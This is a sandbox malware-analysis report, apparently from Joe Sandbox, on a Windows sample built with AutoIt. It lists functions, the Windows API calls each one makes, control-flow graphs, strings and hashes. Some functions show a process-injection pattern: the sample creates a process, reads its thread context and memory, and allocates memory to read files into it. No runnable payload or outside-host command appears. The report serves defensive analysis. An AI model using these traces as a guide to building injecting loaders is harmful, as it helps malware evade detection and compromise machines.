                                                                          control_flow_graph 760 313633-313681 762 3136e1-3136e3 760->762 763 313683-313686 760->763 762->763 764 3136e5 762->764 765 3136e7 763->765 766 313688-31368f 763->766 769 3136ca-3136d2 DefWindowProcW 764->769 770 34d0cc-34d0fa call 321070 call 321093 765->770 771 3136ed-3136f0 765->771 767 313695-31369a 766->767 768 31374b-313753 PostQuitMessage 766->768 773 34d154-34d168 call 372527 767->773 774 3136a0-3136a2 767->774 775 313711-313713 768->775 776 3136d8-3136de 769->776 804 34d0ff-34d106 770->804 777 3136f2-3136f3 771->777 778 313715-31373c SetTimer RegisterWindowMessageW 771->778 773->775 797 34d16e 773->797 780 313755-313764 call 3144a0 774->780 781 3136a8-3136ad 774->781 775->776 784 3136f9-31370c KillTimer call 31443a call 313114 777->784 785 34d06f-34d072 777->785 778->775 782 31373e-313749 CreatePopupMenu 778->782 780->775 787 3136b3-3136b8 781->787 788 34d139-34d140 781->788 782->775 784->775 791 34d074-34d076 785->791 792 34d0a8-34d0c7 MoveWindow 785->792 795 34d124-34d134 call 372d36 787->795 796 3136be-3136c4 787->796 788->769 802 34d146-34d14f call 367c36 788->802 799 34d097-34d0a3 SetFocus 791->799 800 34d078-34d07b 791->800 792->775 795->775 796->769 796->804 797->769 799->775 800->796 805 34d081-34d092 call 321070 800->805 802->769 804->769 809 34d10c-34d11f call 31443a call 31434a 804->809 805->775 809->769
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,?,?,?), ref: 003136D2
                                                                          • KillTimer.USER32(?,00000001), ref: 003136FC
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0031371F
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0031372A
                                                                          • CreatePopupMenu.USER32 ref: 0031373E
                                                                          • PostQuitMessage.USER32(00000000), ref: 0031374D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                          • String ID: TaskbarCreated$%:
                                                                          • API String ID: 129472671-2385568900
                                                                          • Opcode ID: c2c04eb59e519b7ae76ca12a7922f8d8c63a47a90bcd61580f2b8c8d3665d4a7
                                                                          • Instruction ID: 770ce565de6c03cb2404ca5c25681a1b392b8807bc7d018bad6dd77e4054fffe
                                                                          • Opcode Fuzzy Hash: c2c04eb59e519b7ae76ca12a7922f8d8c63a47a90bcd61580f2b8c8d3665d4a7
                                                                          • Instruction Fuzzy Hash: F14104B6200545BBDB2B6F64FC49BFA3BACEB08301F140526F502DB2E1DB719E949761
                                                                          Function 00313A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 00313A50
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00313A5F
                                                                          • LoadIconW.USER32(00000063), ref: 00313A76
                                                                          • LoadIconW.USER32(000000A4), ref: 00313A88
                                                                          • LoadIconW.USER32(000000A2), ref: 00313A9A
                                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00313AC0
                                                                          • RegisterClassExW.USER32(?), ref: 00313B16
                                                                            • Part of subcall function 00313041: GetSysColorBrush.USER32(0000000F), ref: 00313074
                                                                            • Part of subcall function 00313041: RegisterClassExW.USER32(00000030), ref: 0031309E
                                                                            • Part of subcall function 00313041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 003130AF
                                                                            • Part of subcall function 00313041: InitCommonControlsEx.COMCTL32(?), ref: 003130CC
                                                                            • Part of subcall function 00313041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 003130DC
                                                                            • Part of subcall function 00313041: LoadIconW.USER32(000000A9), ref: 003130F2
                                                                            • Part of subcall function 00313041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00313101
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: #$0$AutoIt v3
                                                                          • API String ID: 423443420-4155596026
                                                                          • Opcode ID: 8c01ab6c8b13c231ee82e9cc07e9f799af14fd881ea8e11af2bb8796de6d283b
                                                                          • Instruction ID: 0b1ddfcc55f31c999d691d795e6a73db4952796abd5944b4b35697c3da59ce49
                                                                          • Opcode Fuzzy Hash: 8c01ab6c8b13c231ee82e9cc07e9f799af14fd881ea8e11af2bb8796de6d283b
                                                                          • Instruction Fuzzy Hash: 6E212B71D02304AFEB12DFA4FC49BAD7BB9FB08712F10052BF504AA2A1D3B656548F94
                                                                          Function 00313766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$R=
                                                                          • API String ID: 1825951767-3451155357
                                                                          • Opcode ID: 422daf932921e510e0616095c6f12c3abe385f3517d3faa47668f8a063ca1778
                                                                          • Instruction ID: b6fd93bdb2b19c3325830c813851592a5b162168a8887a0402e690dcef5adf41
                                                                          • Opcode Fuzzy Hash: 422daf932921e510e0616095c6f12c3abe385f3517d3faa47668f8a063ca1778
                                                                          • Instruction Fuzzy Hash: BBA14E7291021DAACF0AEBA4DC91EEEB77CBF19310F44052AF415BB191DF745A89CB60
                                                                          Function 0031F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00330193
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0033019B
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 003301A6
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 003301B1
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(00000011,00000000), ref: 003301B9
                                                                            • Part of subcall function 00330162: MapVirtualKeyW.USER32(00000012,00000000), ref: 003301C1
                                                                            • Part of subcall function 003260F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0031F930), ref: 00326154
                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0031F9CD
                                                                          • OleInitialize.OLE32(00000000), ref: 0031FA4A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 003545C8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                          • String ID: <W=$\T=$%:$S=
                                                                          • API String ID: 1986988660-2225256949
                                                                          • Opcode ID: d5046c3a2b9d547aba6422b0ff97902f5f027e5e02769a3b167edd027879bec0
                                                                          • Instruction ID: 730cf85b6d86855e41297174f7fcf509f9711e1d7049362226ed3af13e8ebfc7
                                                                          • Opcode Fuzzy Hash: d5046c3a2b9d547aba6422b0ff97902f5f027e5e02769a3b167edd027879bec0
                                                                          • Instruction Fuzzy Hash: 36819DB5906A408FC387DF3AB9456597BFDFB59306FA0812BE019CB361EB7044858F12
                                                                          Function 012F9780 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 983 12f9780-12f982e call 12f71b0 986 12f9835-12f985b call 12fa690 CreateFileW 983->986 989 12f985d 986->989 990 12f9862-12f9872 986->990 991 12f99ad-12f99b1 989->991 995 12f9879-12f9893 VirtualAlloc 990->995 996 12f9874 990->996 993 12f99f3-12f99f6 991->993 994 12f99b3-12f99b7 991->994 997 12f99f9-12f9a00 993->997 998 12f99b9-12f99bc 994->998 999 12f99c3-12f99c7 994->999 1000 12f989a-12f98b1 ReadFile 995->1000 1001 12f9895 995->1001 996->991 1002 12f9a55-12f9a6a 997->1002 1003 12f9a02-12f9a0d 997->1003 998->999 1004 12f99c9-12f99d3 999->1004 1005 12f99d7-12f99db 999->1005 1010 12f98b8-12f98f8 VirtualAlloc 1000->1010 1011 12f98b3 1000->1011 1001->991 1006 12f9a6c-12f9a77 VirtualFree 1002->1006 1007 12f9a7a-12f9a82 1002->1007 1012 12f9a0f 1003->1012 1013 12f9a11-12f9a1d 1003->1013 1004->1005 1008 12f99dd-12f99e7 1005->1008 1009 12f99eb 1005->1009 1006->1007 1008->1009 1009->993 1014 12f98ff-12f991a call 12fa8e0 1010->1014 1015 12f98fa 1010->1015 1011->991 1012->1002 1016 12f9a1f-12f9a2f 1013->1016 1017 12f9a31-12f9a3d 1013->1017 1023 12f9925-12f992f 1014->1023 1015->991 1019 12f9a53 1016->1019 1020 12f9a3f-12f9a48 1017->1020 1021 12f9a4a-12f9a50 1017->1021 1019->997 1020->1019 1021->1019 1024 12f9962-12f9976 call 12fa6f0 1023->1024 1025 12f9931-12f9960 call 12fa8e0 1023->1025 1031 12f997a-12f997e 1024->1031 1032 12f9978 1024->1032 1025->1023 1033 12f998a-12f998e 1031->1033 1034 12f9980-12f9984 CloseHandle 1031->1034 1032->991 1035 12f999e-12f99a7 1033->1035 1036 12f9990-12f999b VirtualFree 1033->1036 1034->1033 1035->986 1035->991 1036->1035
                                                                          APIs
                                                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 012F9851
                                                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 012F9A77
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileFreeVirtual
                                                                          • String ID:
                                                                          • API String ID: 204039940-0
                                                                          • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                          • Instruction ID: 43358cc13471d2100844788d8e70e52cf862adbcfca8d188ca125be5a46414f3
                                                                          • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                          • Instruction Fuzzy Hash: E5A11870E1020AEBDF14CFA4C895BEEFBB5FF48304F108569E205AB280D7759A85CB55
                                                                          Function 003139D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1114 3139d5-313a45 CreateWindowExW * 2 ShowWindow * 2
                                                                          APIs
                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00313A03
                                                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00313A24
                                                                          • ShowWindow.USER32(00000000,?,?), ref: 00313A38
                                                                          • ShowWindow.USER32(00000000,?,?), ref: 00313A41
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateShow
                                                                          • String ID: AutoIt v3$edit
                                                                          • API String ID: 1584632944-3779509399
                                                                          • Opcode ID: 2dc92d5fca1dc1fb0b7fc95ad1229fbbc036af5d58f85bf3ef4f772575b27958
                                                                          • Instruction ID: 8c3524694cd057653d16ff85a4549aca1ee5e1ed8b4d09c11f66955cbf346801
                                                                          • Opcode Fuzzy Hash: 2dc92d5fca1dc1fb0b7fc95ad1229fbbc036af5d58f85bf3ef4f772575b27958
                                                                          • Instruction Fuzzy Hash: 39F0D471A42690BEEB325B67BC49E6B2F7DE7C6F50F00452BB904E21B0C6721855DAB0
                                                                          Function 012F9560 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1115 12f9560-12f967c call 12f71b0 call 12f9450 CreateFileW 1122 12f967e 1115->1122 1123 12f9683-12f9693 1115->1123 1124 12f9733-12f9738 1122->1124 1126 12f969a-12f96b4 VirtualAlloc 1123->1126 1127 12f9695 1123->1127 1128 12f96b8-12f96cf ReadFile 1126->1128 1129 12f96b6 1126->1129 1127->1124 1130 12f96d3-12f970d call 12f9490 call 12f8450 1128->1130 1131 12f96d1 1128->1131 1129->1124 1136 12f970f-12f9724 call 12f94e0 1130->1136 1137 12f9729-12f9731 ExitProcess 1130->1137 1131->1124 1136->1137 1137->1124
                                                                          APIs
                                                                            • Part of subcall function 012F9450: Sleep.KERNELBASE(000001F4), ref: 012F9461
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 012F9672
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileSleep
                                                                          • String ID: 06XJBKZHR2
                                                                          • API String ID: 2694422964-1194987141
                                                                          • Opcode ID: 3650f9d682832f1ed9e60337670bae22ba0b688ad5a3c16e82361743d0bc58b1
                                                                          • Instruction ID: e6911a1f261ba7d90671243d4c67efa1afc49225db86d1c90d456cf0efa3c150
                                                                          • Opcode Fuzzy Hash: 3650f9d682832f1ed9e60337670bae22ba0b688ad5a3c16e82361743d0bc58b1
                                                                          • Instruction Fuzzy Hash: 65519F70D10249EBEF15DBA4C855BEEBB79EF18304F0041A9E709BB2C0D6790B85CBA5
                                                                          Function 0031407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1139 31407c-314092 1140 314098-3140ad call 317a16 1139->1140 1141 31416f-314173 1139->1141 1144 3140b3-3140d3 call 317bcc 1140->1144 1145 34d3c8-34d3d7 LoadStringW 1140->1145 1148 34d3e2-34d3fa call 317b2e call 316fe3 1144->1148 1149 3140d9-3140dd 1144->1149 1145->1148 1158 3140ed-31416a call 332de0 call 31454e call 332dbc Shell_NotifyIconW call 315904 1148->1158 1161 34d400-34d41e call 317cab call 316fe3 call 317cab 1148->1161 1151 3140e3-3140e8 call 317b2e 1149->1151 1152 314174-31417d call 318047 1149->1152 1151->1158 1152->1158 1158->1141 1161->1158
                                                                          APIs
                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0034D3D7
                                                                            • Part of subcall function 00317BCC: _memmove.LIBCMT ref: 00317C06
                                                                          • _memset.LIBCMT ref: 003140FC
                                                                          • _wcscpy.LIBCMT ref: 00314150
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00314160
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                          • String ID: Line:
                                                                          • API String ID: 3942752672-1585850449
                                                                          • Opcode ID: bca3d6e58bb008d1a18c9fed037909bcfe7fa9076cb455bf708faab24ba64c19
                                                                          • Instruction ID: 4028b72e135bfd191ffc76d9763d4a82b86fa4a26d6e04cb2892987c7914d4cb
                                                                          • Opcode Fuzzy Hash: bca3d6e58bb008d1a18c9fed037909bcfe7fa9076cb455bf708faab24ba64c19
                                                                          • Instruction Fuzzy Hash: 7731B272008304AFD32BEB60EC46FDB77ECAF48300F14491BF58596091EB70A698C782
                                                                          Function 0033541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 1559183368-0
                                                                          • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                          • Instruction ID: ff6bf83f6636066c4b135e35931671e67f90ef6b9aa9a4de62f1f154add92e8d
                                                                          • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                          • Instruction Fuzzy Hash: 0C51C971A00B05DBDB2A8F69D8C066E77B6EF41331F258729F8369A6D0D771ED908B40
                                                                          Function 0031686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00314DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,003D52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00314E0F
                                                                          • _free.LIBCMT ref: 0034E263
                                                                          • _free.LIBCMT ref: 0034E2AA
                                                                            • Part of subcall function 00316A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00316BAD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                          • API String ID: 2861923089-1757145024
                                                                          • Opcode ID: f994bf6ef1f644503473f00f422b542109a5d072aadc70c4560f02bd0c0bd4bb
                                                                          • Instruction ID: b6e0f97e9e4b1a33d0dad2ac046e24959a727436aa35c658033a8f74b2cc7e37
                                                                          • Opcode Fuzzy Hash: f994bf6ef1f644503473f00f422b542109a5d072aadc70c4560f02bd0c0bd4bb
                                                                          • Instruction Fuzzy Hash: 6B915B71900219EFCF1AEFA4DC919EDB7B8FF09310B14442AF815AF2A1DB74A955CB50
                                                                          Function 003135B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,003135A1,SwapMouseButtons,00000004,?), ref: 003135D4
                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,003135A1,SwapMouseButtons,00000004,?,?,?,?,00312754), ref: 003135F5
                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,003135A1,SwapMouseButtons,00000004,?,?,?,?,00312754), ref: 00313617
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: Control Panel\Mouse
                                                                          • API String ID: 3677997916-824357125
                                                                          • Opcode ID: 36f4fd304ed9f65336ea6c2973483fefab936a84967ab009d703edd92ae044d9
                                                                          • Instruction ID: ceebb5439caed7d9fdd84cf8d091c1bc7cde5c267e35a7bf009c2c51bbbbbabb
                                                                          • Opcode Fuzzy Hash: 36f4fd304ed9f65336ea6c2973483fefab936a84967ab009d703edd92ae044d9
                                                                          • Instruction Fuzzy Hash: 0F114871614208BFDB268F64DC809EFB7BCEF48740F01446AE805D7210D2719E949760
                                                                          Function 012F8450 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 012F8C7D
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 012F8CA1
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 012F8CC3
                                                                          • TerminateProcess.KERNELBASE(00000000,00000000,?), ref: 012F8FCC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1723027581.00000000012F7000.00000040.00000020.00020000.00000000.sdmp, Offset: 012F7000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_12f7000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadTerminateThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 572931308-0
                                                                          • Opcode ID: 766b881ec6164bc259338bbbecc08836d97cc5066010a81dd887eea552f5ff52
                                                                          • Instruction ID: c8959e38e8885f766dd4dcbb7d69377c02e3899dcd4be623fe123eb61f93f26a
                                                                          • Opcode Fuzzy Hash: 766b881ec6164bc259338bbbecc08836d97cc5066010a81dd887eea552f5ff52
                                                                          • Instruction Fuzzy Hash: 27620D30A24259DBEB24CFA4C851BDEB772EF58300F1091A9D20DEB390E7759E81CB59
                                                                          Function 0037955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00314EE5: _fseek.LIBCMT ref: 00314EFD
                                                                            • Part of subcall function 00379734: _wcscmp.LIBCMT ref: 00379824
                                                                            • Part of subcall function 00379734: _wcscmp.LIBCMT ref: 00379837
                                                                          • _free.LIBCMT ref: 003796A2
                                                                          • _free.LIBCMT ref: 003796A9
                                                                          • _free.LIBCMT ref: 00379714
                                                                            • Part of subcall function 00332D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00339A24), ref: 00332D69
                                                                            • Part of subcall function 00332D55: GetLastError.KERNEL32(00000000,?,00339A24), ref: 00332D7B
                                                                          • _free.LIBCMT ref: 0037971C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
